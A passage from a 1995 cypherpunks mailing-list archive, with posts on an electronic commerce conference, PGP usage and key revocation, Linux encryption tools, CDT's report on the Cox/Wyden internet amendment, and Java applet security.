>of the company. An new breed of expertise -- electronic commerce
>specialists -- is bound to emerge that focuses on creating increased
>satisfaction and stronger relationships with customers.
>
>However, this emerging electronic marketplace is an unknown and
>much like the "Wild West" of the past needs to be tamed. The
>challenge is simple: using emerging technology how do we create a
>business environment or infrastructure that will ensure efficient
>electronic markets? What does it take in terms of new organization
>structures like the network structures facilitated by smart and
>wireless messaging; new electronic institutions such as brokerages
>staffed by electronic brokers or agents; new business processes
>better suited for mass customization, global sourcing and logistics;
>new financial payment mechanisms and mercantile protocols?
>
>To achieve exploration and exploitation of new frontiers, we need to
>integrate business concerns with the changing technology. This
>conference aims at providing this integration by bringing together
>leading business researchers who specialize in the various facets of
>electronic markets, namely economics, finance, marketing
>production and operations management, and technology experts in
>the industry who are creating the electronic commerce infrastructure.
>In addition, we are inviting experts who specialize in the WWW
>browsers, electronic cash, encryption, software agents, MIME-
>based messaging, EDI and structured documents.
>
>In sum, investments in electronic commerce, whether in time or
>money, typically introduce far-reaching organizational and
>technological issues. The outcome of this conference will be a better
>understanding of the shape, structure, and operation of business in
>the coming millennium.
>
>We hope you are able to attend this conference. Registration
>information and materials are enclosed.
>
>The First International Conference on Electronic Commerce
>
> Conference Sponsors
>---------------------------
>-- National Science Foundation (NSF)
>-- RGK Foundation
>-- IC2 Institute
>-- William E. Simon Graduate School of Business Adminstration,
>The University of Rochester
>-- Center for Information Systems Management and
>College and Graduate School of Business
>The University of Texas at Austin
>
> Who should attend
>------------------------
>* Academics in information systems, marketing, finance,
>organizational behavior, and service management concerned with the
>emerging research topics in the electronic commerce domain.
>* Software developers and managers in the electronic commerce area
>* Executives concerned with developments in banking and finance
>* Executives concerned with providing excellent customer service
>* Executives who make investments in next generation technology
>* Executives who develop internal operations support
>
>Arrangements
>----------------
>Registration
>-------------
>To register for the conference, complete and mail the enclosed
>registration form along with a check (payable to the RGK
>Foundation) for the registration fee before October 13, 1995 to the
>RGK Foundation, 1301 W. 25th Street, Suite 300, Austin Texas
>78705
>
>The registration fee is $300 for all attendees. This registration fee
>covers the banquet on Monday evening, breakfast and lunch on
>Monday and Tuesday, coffee breaks, conference materials, and
>scheduled ground transportation to and from the hotel and
>conference site.
>
>Payment must be made by check or money order payable to the
>RGK Foundation.
>
>Please complete and mail this registration form along with
>registration fee before Friday, October 13, 1995 to:
>
>Electronic Commerce Conference
>RGK Foundation
>1301 W.25th Street Suite 300
>Austin, TX 78705
>
>Phone: 512-474-9298
>Fax: 512-474-6389
>
>Accommodations
>---------------------
>We have reserved a block of rooms at the Red Lion Hotel, 0121 N.
>I-35. You are responsible for making your own hotel reservations
>and guaranteeing your room for late arrival if necessary. Please call
>the RED LION at 512-371-5200 and mention the Electronic
>Commerce Conference.
>
>List of Speakers
>-------------------
>Dr. Nathaniel Borenstein (First Virtual) -- Electronic Commerce
>
>Win Treese (Open Market) -- Challenges facing Online Commerce
>
>Dr. Clifford Neumann (ISI/USC) -- NetCash and NetCheque --
>Electronic Payments
>
>Dr. Arthur Keller (Stanford University and CommerceNet)
>              -- Smart Catalogs and Virtual Catalogs
>
>Dr. Donna Hoffman (Vanderbilt University) -- Hyper-Marketing
>
>Ravi Kalakota (University of Rochester) -- Intermediation and
>Electronic Brokerages
>
>Dr. Jean-Philippe Favreau -- ECAT -- The Government of the
>Future -- National Institute of Standards and Technology
>
>Dave Croker -- Internet EDI -- Brandenburg Consulting
>
>Dr. Preston McaFee (MIT) -- FCC Spread Spectrum Auctions using
>Game Theory
>
>Dr. Andrew Whinston and Dale Stahl (University of Texas at
>Austin) -- Pricing Internet Services
>
>Smoot Carl Mitchell and John Quarterman (Matrix Organization) --
>Internet Service Providers -- Changing Dynamics
>
>Larry Masinter (Xerox Palo Alto Research Center) -- URI, URN
>and URLs -- Implications for the Digital Libraries
>
>Dan Connolly (W3 Organization) -- The evolution of HTML --
>Implications for the Future of the World Wide Web
>
>Dr. Su Shing Chen (National Science Foundation) -- NSF and
>Electronic Commerce
>
>Dr. Jan Stallert (University of Texas at Austin) -- Supply-chain
>Management and Electronic commerce
>
>
>
>Registration Form
>---------------------
>Name (Please type)
>__________________________________________________
>                    (Prof., Dr., Mr., Ms., Mrs.)   First      Last
>
>Title:
>______________________________________________________
>
>Organization:
>______________________________________________________
>_
>
>Address:
>______________________________________________________
>
>
>______________________________________________________
>           City           State      Zip Code       Country
>
>Telephone: (_____)__________________ Work
>(_____)_____________Home
>
>Fax:       (_____)_______________    Email:
>_________________________
>
>Which days do you plan to attend?
>        Sunday, Oct.29  ______ (Reception)
>        Monday, Oct.30  ______ (Lunch)
>        Monday, Oct.30  ______ (Banquet)
>        Tuesday, Oct.31  ______ (Lunch)
>
>Registration Fee:  Before October 13, 1995 ______ $300
>                          :  After October 13, 1995    ______ $350
>(Payment must be made by check or money order payable to the
>RGK Foundation.)
>
>Please complete and mail this registration form along with
>registration fee before Friday, October 13, 1993 to:
>
>Electronic Commerce Conference
>RGK Foundation
>1301 W.25th Street Suite 300
>Austin, TX 78705
>
>Phone: 512-474-9298
>Fax:   512-474-6389
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Fri, 4 Aug 95 21:03:25 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: There's a hole in your crypto...
In-Reply-To: <199508031709.NAA29005@colon.cis.ohio-state.edu>
Message-ID: <Pine.3.89.9508042253.A3820-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 3 Aug 1995, Nathan Loofbourrow wrote:

> Nathan Zook writes:
>  > > And is there any way to build trusted system out of small, verifiable
>  > > pieces?  Since the way they're connected could also be questioned, I
>  > > suspect that when you put enough of them together it's just as bad as
>  > > the case of a single, monolithic program.  But this isn't my area, so
>  > > I don't know.
>  > 
>  > No.  This was essentially proved during the first third of this century.
> 
> Well, I haven't gotten a reply from Nathan Zook on this assertion, so
> can anyone else back it up with some references? Perhaps we're
> discussing different contexts, but proving correct systems composed of
> correct components is still a subject of active research.
> 
> nathan
> 

Sorry about that.  Your message must have died when I splatted the dear 
"Professor" (bow, bow, bow).

There is "active research".  Why is a mystry to me.  Godel's proof was 
the completetion of several works.  On of the earily demonstrated that no 
axiom system can be demonstrated to consistent by a weaker one.  Now the 
"reasearch" in this area has consisted, in part, of translating 
algorithms into statements in axiomatic systems.  The problem is that 
either we cannot prove that these systems are consistent or they are 
extremely limited in what they can do.  (In particular, recursion seems 
to be anthema.)  But the word proof in the previous sentence has to be 
taken with a grain of salt, because any axiom system that we use to prove 
things about another axiom system has to be at least as complicated.

This is why the "not a Turing machine" assertion that the "Professor" is 
important.  We know that Turing machine is undecidable, so if we want to 
limit behavior, we can't have one.  BUT---we don't know that being a 
Turing machine is equivalent to having "unpredictable" behavior.  
Furthermore, a "proof" of the "not a Turing machine" assertion is going 
to have to be done by--you guessed it--a computer.  And this computer is 
running a program which definitely IS a Turing machine, if it is capable 
of "proving" that other (suitably non-trivial) programs are not Turing 
machines.

Why must this be done on a computer?  Because the program under 
consideration is thousands of machine instructions long.  And each 
instruction will be translated into dozens of statements in the axiom 
system.  So any attempted proof will be beyond human ability.

Note that the above arguments do not require the physical exsistance of 
computers to make, which is why I refered to the "first third of this 
century", when these ideas were discovered.  In reality, the fact that 
the program itself has been compiled (or was it written in machine 
code?), that it uses an operating system (or does it address all of 
the hardware independedly of other programs?), and runs on a processor 
(maybe a 80586?) should be enough to convince serious critics of the 
futility of the exercise.


But the nagging question remains:  Why can't we build up big blocks from 
little ones?  While there is a sort of "Turing horizon" beyond which 
programs are known to be unpredictable, let me attempt to address the 
problem another way, to redefine our intuition to be more in touch with 
reality.

The situation we are dealing with amounts to the phenomina of 
"spontaneous complexity".  First, some physical examples.  Take an object 
moving in a Newtonian space, with nothing else there.  Give initial 
conditions, tell me what happens next.  No problem.  Take two objects.  
No problem.  Take three objects.  Big problem.  Why?  Perhaps we just 
haven't figured out the mathematics yet.  Okay, take five objects.  Why 
five?  Because it is known that with a particular initial condition for 
five objects, all objects will "leave the universe" in a finite amount of 
time (!!!!!).  Now what if you bump them a little bit?  Certainly not all 
combinations of initial conditions lead to this situation.  Which is 
which?  Can this behavior be "built up" from two-object situations? 

It is important to note that this type of complexity was in fact 
discovered by Poincare' and others shortly after the turn of the 
century.  Some of his sketches clearly are forerunners of the Mandelbrot 
set--he was considering these types of ideas.  (The complexity issues 
lost out first to relativity and then to quantum mechanics in the 
competition for the minds of researchers.)

Then there is the Mandelbrot set--which points are in and which are out?  
Are you sure?  (Go ahead and limit yourself to rational points--we are 
talking computers.)

Take S^1, the unit circle in the Complex plane.  Define a series of 
functions f_1, f_2... on S^1 as follows:  f_i(z) = z^i.  Each point with 
rational multiple of pi argument will limit to one, but no irrational 
points will.  What is important to note is that there is a set uniform 
set of measure 0 on S^1 such that the behavior in the limit of this set is 
completely unpredicted by the behavior of the rest of the set.  Perhaps 
you prefer to map S^1 to S^1 by repeated applications of f_2?  Then only the 
binary rationals settle down. 

So in each case, complex (in the technical sense) behavior is exhibited 
by outlandishly simple systems.  Sohow the _interactions_ of these simple 
and predictable systems become unpredictable.


That is why I consider this to be a closed subject.

Nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 4 Aug 95 20:09:16 PDT
To: rsalz@osf.org
Subject: Re: Java and Safe-TCL security (was Re: Java, Netscape, OpenDoc, and Babel)
Message-ID: <9508050307.AA24965@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for not being clear:  when I talked about compile-time safety, I
was referring to safe-tcl.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 4 Aug 95 23:45:17 PDT
To: remailer@spook.alias.net
Subject: fnords
Message-ID: <199508050641.XAA01362@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


:: 
Request-Remailing-To: wilcoxb@nag.cs.colorado.edu
Subject: Why I don't sign all my mail
Latent-Time: +0:00
Cutmarks: #--

-----BEGIN PGP SIGNED MESSAGE-----

Bryce - you write:
> Thanks for the info, Bill.  I have a question:  why are you
> sending e-mail in the clear and without authentication?
> I don't expect that anyone would want to forge mail from you
> to me, but I would be pleased if I could be a little more 
> certain of those things, and besides "Think of it as a form of
> solidarity."

Convenience, mostly.  Encryption and signature are semi-different issues.
If I clear-sign something, and you don't want to check it, it doesn't cause
you any trouble, but for most people,
getting mail that's encrypted takes extra work, especially
if they're following proper security procedures for their
PGP implementations (not running it on insecure systems, 
not leaving passphrases in cleartext for autosigners, etc.)
Think of proper security as "solidarity with people who need
real security" :-).  (Yeah, I also run PGP on insecure systems,
mainly for signature-checking, but I do use separate keys that
have words like "insecure" in the userid strings.)

The big issues are convenient interfaces with my email system.
Private Idaho's gotten good enough that if I want to send
encrypted/signed/etc. email, I can grab the mail I want to send
into the clipboard (or compose it inside PI), add headers
for who to send it to, pull down a couple menu items,
and it pops into PGP; when it's done, another menu choice
dumps the completed message back into Eudora, and the next version can send
it out directly if I prefer.  On the other hand,
moving mail _from_ Eudora _to_ PI is still a couple actions
(separate cut/pastes for the body, address, and Subject:),
so I don't usually bother.

The other convenience problem is key-handling for people whose
keys I don't already have.  PGP is too slow on a PC to haul
the entire keyserver database into my pubkey files.  
So either I have to send email to a key-server (non-real time,
especially since I do most of my email off-line), or use finger.

Unfortunately, your key wasn't on the keyservers, and I don't
have a decent PC finger client now that I'm using Trumpet Winsock
instead of Netcruiser (the finger client I use doesn't allow
cut&paste to the clipboard, screen-grabs didn't get me text,
and I did eventually get most of your key information by doing
several "telnet you@machine 79"s until one of them got the
data before the session closed :-)  Ugly...

And then there's the key validation problem - your key isn't 
signed by anyone except yourself (yeah, ok, mine's only got
signatures from previous keys of mine, which have signatures
from expired keys from the people who signed mine :-)
So my signature isn't as meaningful as it could be,
since you probably can't validate it, and I can't guarantee having a valid
public key for you to send you anything important.

So I guess I need to go get my keys signed by a couple people,
and so do you, and the next code project on my wait-until-3.0 list should
probably be a recursive key-signature digger...

Meanwhile, Private Idaho is at ftp.eskimo.com/u/j/joelm/,
and it's now working with ViaCrypt-for-Windows as well as
PGP 2.6.* for DOS.
                            Thanks;  Bill Stewart
                            stewarts@ix.netcom.com


-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQBVAwUBMCMPB/thU5e7emAFAQFYPAH7BXuxp0BCWKg8v/Uv6QzUQKSix3Zff3Kw
FzBeSgDNN9KrOHEaUmemDXcBmcRabyeZyxrFTcgypvwADai1SYA45w==
=Ht4c
-----END PGP SIGNATURE-----
#--

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 4 Aug 95 20:44:09 PDT
To: Gerstein@scsud.ctstateu.edu (Adam J. Gerstein)
Subject: Re: Using MacPGP to revoke a key...
Message-ID: <v02130501ac483cc36156@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 8/3/95, Adam J. Gerstein wrote:
>Sorry to bother y'all with such an amateur question, but I can't find this
>in TFM, so I figured I'd ask those who are more in the know.....
>
>Anyway, I'm considering revoking my public key because it's been out there
>a while and I'm feeling the urge to change to a larger key, but I'm not
>clear on how to revoke the old one. Do I just make a text file with my new
>key in it, explain that I'm revoking the old one, sign it with my new key
>and then post it to the list? Or do I just send it to a keyserver?
>
>Again, I'm sorry to be asking y'all about something so easy. I don't want
>to start a whole new thread about this, so if you've got something helpful
>to add, please send it via private mail.

There is no need to revoke the old key - you just create a new key with
both the old and new keys and send it to the KeyServer. The normal PGP
"Default" when there are more than one key with the same Email Address is
to use the last one (which would be last in the keyring as well as have the
latest date). By leaving the old key as NOT revoked it can still be used
but will tend to be replaced by the new longer key as people get your key
from the Server.

If you DO want to revoke the old key, you just send the Revocation
Certificate to the KeyServer along with the new longer key (but note that
then, I think you will not be able to decode messages sent with the old
key).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matt Miszewski (IAAL - I AM a lawyer!)" <crypto@midex.com>
Date: Fri, 4 Aug 95 15:46:29 PDT
To: perry@piermont.com
Subject: Re: IPng6, SWIPE, ssh, etc.
In-Reply-To: <199508042138.RAA05009@panix4.panix.com>
Message-ID: <Pine.3.89.9508042348.A14665-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 4 Aug 1995, Perry E. Metzger wrote:

> 
> You don't need to use IPv6 for the security, by the way -- its defined
> to work on either. If you want, of course, I'm sure the v6 folks would
> love a Linux v6 stack to show up soon...

And so would dedicated Linux users from around the globe!  Linux is quite 
liberating, but security is a whole different concern.

Matt


> 
> Perry
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Sat, 5 Aug 95 00:01:35 PDT
To: cypherpunks@toad.com
Subject: Cox/Wyden passed, but so did "Managers' Amendment"
Message-ID: <199508050701.AAA00510@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


------------------------------------------------------------------------
   ******    ********    *************
  ********   *********   *************
  **         **      **       ***               POLICY POST
  **         **      **       ***
  **         **      **       ***               August 4, 1995
  **         **      **       ***               Number 23
  ********   *********        ***
   ******    ********         ***

  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 23                       August 4, 1995

CONTENTS: (1) House Approves Cox/Wyden 'Internet Freedom' Bill 420 to 4
              Major Victory for Cyberspace -- Indecency Statues Remain
              A Serious Issue
          (2) Subcribe To The CDT Policy Post Distribution List
          (3) About CDT, Contacting US

This document may be re-distributed freely provided it remains in its
entirety.
------------------------------------------------------------------------

(1) HOUSE PASSES COX/WYDEN 'INTERNET FREEDOM' AMENDMENT
    MAJOR VICTORY FOR CYBERSPACE -- INDECENCY STATUTES REMAIN A MAJOR
    ISSUE

By a overwhelming vote of 420 to 4, the US House of Representatives
today approved the 'Internet Freedom and Family Empowerment' amendment,
sponsored by Reps. Chris Cox (R-CA) and Ron Wyden (D-OR), which would
prohibit the federal government from regulating content on the Internet,
commercial online services, and other interactive media.

Unlike the Senate-passed Exon/Coats Communications Decency Act (CDA),
the Cox/Wyden amendment ensures that individuals and parents can decide
for themselves what information they or their children receive. By
contrast, the Exon/Coats CDA would grant the Federal Communications
Commission (FCC) broad powers to regulate the expression of each and
every one of the millions of users of the Internet.

The Cox/Wyden amendment:

* Prohibits the FCC from imposing content regulations on the Internet or
  other interactive media.

* Removes disincentives for online service providers to exercise
  editorial control over their networks and to provide blocking and
  screening technologies to their uses.

* Seeks to create a uniform national policy prohibiting content
  regulations in interactive media.

CDT believes that the Cox/Wyden amendment is an enlightened approach to
addressing the issue of children's access to objectionable material
online. Unlike the Senate-passed CDA, the Cox/Wyden approach recognizes
that the Internet is a global, decentralized network, with abundant
capacity for content and tremendous user control.

House passage of the Cox/Wyden amendment sets the stage for a direct
battle between the House and Senate on the issue of government content
regulation in interactive media. CDT will work vigorously to ensure that
the Cox/Wyden amendment replaces the Exon/Coats CDA in the final version
of telecommunications Reform legislation.

NEW UNCONSTITUTIONAL INDECENCY RESTRICTIONS ALSO APPROVED

Although the House vote today significantly advanced freedom of speech
on the Internet, the threat of unconstitutional indecency restrictions
remains.

In a vote unrelated to the Cox/Wyden amendment, the House also approved
changes to federal obscenity laws which would criminalize the
transmission of constitutionally protected speech online. These
amendments were approved as part of the "Managers Amendment" to the
Telecommunications reform bill (HR 1555). Although these amendments are
more narrowly drawn than the Exon/Coats CDA or the Grassley/Dole
"Protection of Children from Computer Pornography Act (S. 892), they
clearly violate the First Amendment and remain an issue of serious
concern to CDT.

The new criminal law amendments are opposed by several prominent members
of both the House and Senate, including Cox and Wyden. As the bill makes
its way through the House/Senate conference committee, CDT will work
with Reps. Cox and Wyden, Senator Leahy, and others to:

* Remove the unconstitutional indecency restrictions added as part of
  the "Managers amendment"

* Ensure that the Cox/Wyden amendment replaces the Exon/Coats CDA in the
  final telecommunications reform bill

* Clarify that the Cox/Wyden amendment does not affect privacy
  protections under the Electronic Communications Privacy Act (ECPA)

* Strengthen provisions that pre-emption state online censorship laws.

COX/WYDEN AMENDMENT PROTECTS CYBERSPACE FROM GOVERNMENT INTRUSION,
RECOGNIZES PARENTAL CONTROL POSSIBILITIES

The Cox/Wyden bill seeks to accomplish four principal objectives:

* PROHIBIT FCC CONTENT REGULATION OF THE INTERNET AND INTERACTIVE
  COMMUNICATIONS SERVICES.

  The bill explicitly prohibits the Federal Communications Commission
  from imposing or content or other regulations on the Internet or other
  interactive communications services (Sec 2 (d)).

  This provision recognizes that Interactive media is different from
  traditional mass media (such as broadcast radio and television), and
  will enshrine in statue strong protections for all content carried on
  the Internet and other interactive communications services. Instead of
  relying on government censors to determine what is or is not
  appropriate for audiences, this provision recognizes that individuals
  and parents are uniquely qualified to make those judgments.

* REMOVE DISINCENTIVES FOR ONLINE SERVICE PROVIDERS TO EXERCISE
  EDITORIAL CONTROL OVER THEIR NETWORKS AND TO DEPLOY BLOCKING AND
  SCREENING TECHNOLOGIES FOR THEIR SUBSCRIBERS.

  The bill would remove liability for providers of interactive
  communications services who take good faith steps to restrict access
  to obscene or indecent materials to minors or provide software or
  hardware to enable their users to block objectionable material.(Sec 2
  (c))  In addition, the bill would overturn the recent court  decision
  (Stratton Oakmont, Inc. v. Prodigy Services Co., N.Y. Sup. Ct. May 24,
  1995) which held Prodigy liable for content on its network
  because the service screens for sexually explicit material and
  language.  Prodigy now faces a $200 million lawsuit.

  The bill does not intend to create an obligation for providers to
  monitor or screen content or to allow violation of Federal privacy
  statutes (such as the Electronic Communications Privacy Act), although
  some concerns remain on these points. CDT remains committed to
  addressing these concerns as the legislation moves to conference, and
  has been assured by Rep. Cox and Wyden that these issues will be
  addressed.

* PRE-EMPT INCONSISTENT STATE LAWS REGULATING CONTENT ON INTERACTIVE
  COMMUNICATIONS SERVICES.

  The bill seeks to pre-empt States from enforcing inconsistent laws,
  including restrictions on content available on interactive
  communications services.  (Sec 2 (e)(2))

  The actual scope of this preemption remains an issue of some
  discussion. CDT believes that any legislation in this area MUST
  contain a strong pre-emption of inconsistent state laws. A patchwork
  of state laws which impose varying, and in some cases contradictory,
  obligations on service providers and content providers must be
  avoided. CDT will work to ensure that the Cox/Wyden bill creates a
  uniform national policy which prohibits states from imposing content
  regulations on interactive media.

* NO EFFECT ON CRIMINAL LAW.

  The bill is not intended to prevent the enforcement of the current
  dial-a-porn statute or other Federal criminal statutes such as
  obscenity, child pornography, harassment, etc. (Sec 2 (e)(1))

NET ACTIVISM A CRITICAL FACTOR

When Senator Exon (D-NE) first proposed the CDA in February 1995, the
net.community reacted with strong opposition. A coalition of online
activist organizations, including CDT, EFF, People for the American Way,
EPIC, the ACLU and organized with the Voters Telecommunications Watch
(VTW), worked tirelessly over the last six months to mobilize grass
roots opposition to the CDA. Through our efforts of generating thousands
of phone calls to Congressional offices and an online petition which
generated over 100,000 signatures in support of an alternative to the
CDA, the net.community was able to demonstrate that we are a political
force to be reckoned with.

The net.campaign and public education efforts helped to encourage House
Speaker Newt Gingrich (R-GA) to come out against the CDA, and was an
important factor in Reps. Cox and Wyden's decision to propose their
alternative. As the legislation moves to the conference committee and
then on to final passage, the net.community must be prepared to continue
to fight to ensure that the new criminal provisions are removed and that
the Cox/Wyden amendment is not weakened.

GENESIS OF THE COX/WYDEN AMENDMENT

After the Senate passed the CDA by a vote of 84-16 on June 14, CDT
stepped up our efforts to find an alternative which protected the First
Amendment and recognized the unique nature of interactive media. Both on
our own and through the Interactive Working Group (a group of over 80
public interest organizations and leading computer and communications
companies, content providers, and others, coordinated by CDT. The IWG
includes the ACLU, People for the American Way, the Progress and Freedom
Foundation, America Online, MCI, Compuserve and Prodigy, and many other
organizations and corporations), worked directly with Reps. Cox and
Wyden to bolster the case that parental control technologies offered an
effective alternative to government content regulations.

To this end, the IWG held a demonstration for members of Congress and
the press in mid-July to demonstrate parental control feature of
products offered by Netscape, SurfWatch, WebTrack, America Online, and
Prodigy.

In addition, the IWG issued a comprehensive report reviewing current
technology and the state of current laws prohibiting trafficking in
obscenity, child pornography, stalking, threats, and other criminal
conduct online (this report can be viewed on CDT's web site
URL:http://www.cdt.org/iwg/IWGrept.html).

Through these efforts and the efforts of VTW's online coalition, to
educate members of the House about the problems with the Exon/CDA and
the promise of interactive media, the House today has enacted an
enlightened approach to dealing with children's access to inappropriate
material online. Today's vote represents a tremendous victory for the
first amendment and the promise of cyberspace.

NEXT STEPS

The House Telecommunications legislation (HR 1555) is expected to pass
later today (8/4). The Senate approved similar legislation (S. 652) in
June. Both bills now move to a House/Senate Conference Committee where
differences will be worked out. The Conference Committee is expected to
begin deliberation in early September. Once the Conference Committee
agrees on a version of the bill, it will be sent back to both the House
and Senate for final approval. This vote is expected to occur before the
end of October.

The Internet-censorship provisions of the Senate bill are among the key
difference between the House and Senate proposals. However, several key
members of the Senate, including Senator Patrick Leahy (D-VT) and Russ
Feingold (D-WI) have expressed opposition to the Exon/Coats approach.

CDT will fight vigorously throughout the remainder of this Congress to
ensure that the Exon/Coats CDA does not become law. We will also work to
remove the new unconstitutional criminal law amendments passed by the
House today.

------------------------------------------------------------------------
(3) How To Subcribe To The CDT Policy Post Distribution List

CDT Policy Posts, which is what you have just finished reading, are the
regular news publication of the Center For Democracy and Technology. CDT
Policy Posts are designed to keep you informed on developments in public
policy issues affecting civil liberties online.

SUBSCRIPTION INFORMAITON

1. SUBSCRIBING TO THE LIST

To subscibe to the policy post distribution list, send mail to
"Majordomo@cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)


2. UNSUBSCRIBING FROM THE LIST

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@cdt.org" with the following command
in the body of your email message:

    unsubscribe policy-posts youremail@local.host (your name)

(leave the subject line blank)

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization. The Center's mission is to develop and advocate public
policies that advance constitutional civil liberties and democratic
values in new computer and communications technologies.

Contacting us:

General information on CDT can be obtained by sending mail to


World-Wide-Web:

   http://www.cdt.org/

ftp:

   ftp://ftp.cdt.org/pub/cdt/

snail mail:

Center For Democracy and Technology
1001 G Street, NW Suite 700 East
Washington, DC 20001
voice: +1.202.637.9800
fax:   +1.202.637.0968




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matt Miszewski (IAAL - I AM a lawyer!)" <crypto@midex.com>
Date: Fri, 4 Aug 95 15:58:57 PDT
To: "Stephen D. Williams" <sdw@lig.net>
Subject: Re: IPng6, SWIPE, ssh, etc.
In-Reply-To: <m0seRLR-0009yuC@sdwsys>
Message-ID: <Pine.3.89.9508050050.A14679-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 4 Aug 1995, Stephen D. Williams wrote:

> I'm interested in hacking Linux, loopback userspace drivers for other Unix's,
> and thinking about what would need to be done for MS-BLECH.  Of course,
> firewall like conversion of IP<->IPng6 would be great.

Please keep me informed of your progress.  Does anyone out there have a 
somewhat comprehensive listing of these or other implementations 
already ported to Linux?  I am intending on setting up an alternative 
site for folks with nosey or suppressive employer accounts or private 
university accounts who desire an anonymous account somewhere else.

> 
> Of course now that Linux has IP aliasing, IP masquerading (partial I think),
> ipfw, and IP over IP tunneling, it has much of what it needs.  I'm just
> considering development and migration paths.
> 

While they are getting better and better, I am not certain that anything 
is ready to be deemed as secure as it can be.


> I haven't kept up on IPng6 docs, so succinct pointers would be helpful.

In that same spirit, does anyone have pointers to Linux specific security 
implementations.  I would also be interested in ported implementations of 
remailers, or other annonymity protecting services.

> -- 
> Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
> Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
> OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
> Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95
> 

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ghio <ghio@utopia.hacktic.nl>
Date: Fri, 4 Aug 95 18:09:12 PDT
Subject: Re: IPng6, SWIPE, ssh, etc.
In-Reply-To: <m0seRLR-0009yuC@sdwsys>
Message-ID: <199508050109.DAA03142@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Matt Miszewski IAAL - I AM a lawyer! (crypto@midex.com) wrote:

: Please keep me informed of your progress.  Does anyone out there have a 
: somewhat comprehensive listing of these or other implementations 
: already ported to Linux?  I am intending on setting up an alternative 
: site for folks with nosey or suppressive employer accounts or private 
: university accounts who desire an anonymous account somewhere else.

I have used deslogin and ctelnet with Linux

: In that same spirit, does anyone have pointers to Linux specific security 
: implementations.  I would also be interested in ported implementations of 
: remailers, or other annonymity protecting services.

All the remailers that I know of work with Linux.

Here's a list of crypto apps that I know will run under Linux:

ssh
cryptod/ctelnet
deslogin
cfs
pgp
datalock
mixmaster v2

Stuff I'm not sure about:

esm
swipe


Anything else?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Sat, 5 Aug 95 01:12:44 PDT
To: cypherpunks@toad.com
Subject: Secure FileSystem vs Secure Device
Message-ID: <199508051026.FAA16096@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


         Secure FileSystem vs Secure Device

Cypherpunks,

   I have been studing the software package SFS110 ( Secure File-
System) version 1.10 by Peter Gutmann. I originally wanted to use
SECDEV (Secure Device) but mistook Secure File System for it. I have
heard references to Secure Device on Cypherpunks but I have heard
nothing about Secure FileSystem.

   Does anyone have knowledge of both of these systems & can give me
advice on which is superior? Also, I found Secure Device compressed
with a .arj compression system. What is this compression method? Is
there a DOS version of Secure Device?

   I have done some preliminary reading of Secure FileSystem & I find
it to be very impressive! So, why no mention on Cypherpunks? Is Secure
Device that much superior or has Secure FileSystem just been over-
looked? Also, what are the latest version numbers of both of them?

                                 PUSH EM BACK! PUSH EM BACK!
                                 WWWAAAYYYY   BBBAAACCCCK!
                                 BBBEEEAAATTTT  STATE!
                                 Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sat, 5 Aug 95 00:51:58 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199508040517.BAA05467@clark.net>
Message-ID: <9508050751.AA22209@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


|>   Finally, all you have to do to remove all I/O ability from Java is delete
|> the File I/O classes from the class hierarchy on your disk where HotJava
|> runs. Most apps don't use any File I/O anyway.

For Java to reach its full potential, I think it is absolutelly essential
that applets have the ability to securely and reliably store information
for long periods of time. In the long term, this means creating remote
applet accessible datahavens. But as a temporary hack, before clean code
supporting such services becomes available, very limited local file access
